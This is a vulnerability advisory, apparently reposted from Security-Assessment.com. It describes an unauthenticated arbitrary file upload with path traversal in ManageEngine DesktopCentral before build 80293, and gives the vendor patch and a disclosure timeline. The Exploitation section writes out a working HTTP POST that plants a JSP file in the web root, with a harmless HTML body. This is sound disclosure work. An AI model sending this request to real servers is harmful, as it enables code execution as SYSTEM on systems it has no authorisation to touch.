DesktopCentral Shell Upload

2013.11.19
Credit: Security-Assessment
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

( , ) (, . `.' ) ('. ', ). , ('. ( ) ( (_,) .`), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _='`"``=. presents.. DesktopCentral Arbitrary File Upload Vulnerability Affected versions: DesktopCentral versions < 80293 PDF: http://security-assessment.com/files/documents/advisory/DesktopCentral%20Arbitrary%20File%20Upload.pdf +-----------+ |Description| +-----------+ ManageEngine DesktopCentral 8.0.0 build belows 80293 suffer from an arbitrary file upload vulnerability that can be leveraged to gain arbitrary code execution on the server. The code run on the server in this fashion will execute as NT-AUTHORITY\SYSTEM. The problem exists in the AgentLogUploadServlet. This servlet takes input from HTTP POST and constructs an output file on the server without performing any sanitisation or even checking if the caller is authenticated. Due to the way the path is constructed it is possible to traverse to the application web root and create a script file that will be executed when called from a web browser. +------------+ |Exploitation| +------------+ POST/agentLogUploader?computerName=DesktopCentral&domainName=webapps& customerId=..&filename=test.jsp HTTP/1.1 Host: <desktopcentral>:8020 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Connection: keep-alive Content-Type: text/html; Content-Length: 109 <HTML> <HEAD> <TITLE>Hello World</TITLE> </HEAD> <BODY> <H1>Hello World</H1> </BODY> </HTML> +----------+ | Solution | +----------+ Apply the patch supplied by the vendor (Patch 80293) +-------------------+ |Disclosure Timeline| +-------------------+ 20/10/2013 ? Vulnerability discovered, vendor notified. 25/10/2013 ? Vendor acknowledges issue 30/10/2013 - Vendor issues Patch 80293 that fixes the issue 09/11/2013 ? Exploit demonstrated at Kiwicon 7 18/11/2013 ? Advisory released. +-----------------------------+ |About Security-Assessment.com| +-----------------------------+ Security-Assessment.com is a New Zealand based world leader in web application testing, network security and penetration testing. Security-Assessment.com services organisations across New Zealand, Australia, Asia Pacific, the United States and the United Kingdom. Security-Assessment.com is currently looking for skilled penetration testers. If you are interested, please email 'hr at security-assessment.com'

References:

http://security-assessment.com/files/documents/advisory/DesktopCentral%20Arbitrary%20File%20Upload.pdf


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top